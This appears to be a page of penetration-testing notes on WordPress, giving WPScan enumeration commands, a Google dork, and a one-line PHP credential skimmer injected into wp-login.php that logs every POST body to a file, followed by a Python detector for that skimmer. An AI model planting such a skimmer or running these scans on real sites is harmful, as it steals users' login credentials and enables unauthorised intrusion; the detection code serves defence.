WordPress

WPscan:

wpscan -u 10.10.10.10/wp/
wpscan --url http://10.10.10.10 --detection-mode aggressive -t 20 -e u,ap,tt,vt

Interesting features:

  • Enumerate directories, users

  • Password attacks

  • Scan for vulns in core, plugins, themes

WordPress files:

  • wp-config.php: holds the database credentials (DB_USER / DB_PASSWORD); a readable copy is a password leak

WP Credential Skimming:

This attack needs backdoor (file-write) access. In htdocs, edit wp-login.php and add the following as the first line of the file:

<?php file_put_contents('log.txt', file_get_contents('php://input'));?>

This captures incoming POST bodies and saves them to a text file in the htdocs folder; the captured input then shows up in that file whenever someone logs in or performs other interesting POST activity.
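From the defender's side, the skimmer above leaves two artifacts: a modified core file (wp-login.php no longer matches the release hash) and a PHP statement that copies php://input into a file. The following is an added example (not part of the original notes) that automates both checks over file contents; the sample wp-login.php bodies and the baseline hash are constructed for the demo, and in practice the baseline would come from the matching upstream WordPress release.

```python
"""Detect the wp-login.php credential-skimmer pattern (added example).

Two checks a defender can run on a WordPress webroot:
  1. a regex sweep for PHP that reads php://input and writes it to a file,
  2. an integrity check of core files against a known-good SHA-256 baseline,
     which also flags unexpected extra files (e.g. the skimmer's log.txt).
All sample file contents below are constructed for this demo.
"""
import hashlib
import re
from typing import Dict, List

# Matches PHP that persists the raw request body, e.g. the injected line
#   <?php file_put_contents('log.txt', file_get_contents('php://input'));?>
# including spacing/quoting variants. Runs per line so hits are reportable.
SKIMMER_RE = re.compile(
    r"file_put_contents\s*\(.*?file_get_contents\s*\(\s*['\"]php://input['\"]",
    re.IGNORECASE,
)


def find_skimmer_lines(php_source: str) -> List[int]:
    """Return 1-based line numbers where a php://input skimmer appears."""
    return [
        lineno
        for lineno, line in enumerate(php_source.splitlines(), start=1)
        if SKIMMER_RE.search(line)
    ]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_core_files(files: Dict[str, bytes], baseline: Dict[str, str]) -> Dict[str, str]:
    """Compare webroot files against a path -> sha256 baseline.

    Returns {path: 'ok' | 'MODIFIED' | 'UNEXPECTED' | 'MISSING'}.
    UNEXPECTED catches dropped files such as the skimmer's log.txt.
    """
    result: Dict[str, str] = {}
    for path, content in files.items():
        if path not in baseline:
            result[path] = "UNEXPECTED"
        elif sha256_hex(content) != baseline[path]:
            result[path] = "MODIFIED"
        else:
            result[path] = "ok"
    for path in baseline:
        if path not in files:
            result[path] = "MISSING"
    return result


def audit(files: Dict[str, bytes], baseline: Dict[str, str]) -> Dict[str, dict]:
    """Combine both checks: per-file integrity status plus skimmer hits."""
    integrity = verify_core_files(files, baseline)
    report: Dict[str, dict] = {}
    for path, status in integrity.items():
        content = files.get(path, b"")
        hits = find_skimmer_lines(content.decode("utf-8", errors="replace")) if path.endswith(".php") else []
        report[path] = {"integrity": status, "skimmer_lines": hits}
    return report


# --- constructed sample data -------------------------------------------------
# A minimal stand-in for a clean wp-login.php (not the real file).
CLEAN_WP_LOGIN = b"<?php\n/**\n * WordPress User Page\n */\nrequire __DIR__ . '/wp-load.php';\n"
# The same file with the skimmer line from the notes prepended.
TAMPERED_WP_LOGIN = (
    b"<?php file_put_contents('log.txt', file_get_contents('php://input'));?>\n"
    + CLEAN_WP_LOGIN
)
# Baseline built from the clean sample; a real one comes from the upstream release.
BASELINE = {"wp-login.php": sha256_hex(CLEAN_WP_LOGIN)}


if __name__ == "__main__":
    compromised_webroot = {"wp-login.php": TAMPERED_WP_LOGIN, "log.txt": b"log=admin&pwd=..."}
    for path, finding in audit(compromised_webroot, BASELINE).items():
        print(f"{path}: {finding}")
```

Run against a real install, the baseline is the hash list of the same WordPress version's release archive, and any "MODIFIED" core file or "UNEXPECTED" writable file in the webroot is worth a manual look even when the regex finds nothing, since skimmers are easily obfuscated.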

Google dork for vulnerable versions. Example: "error_log" inurl:/wp-content

Look for vulnerable plugins:

Last updated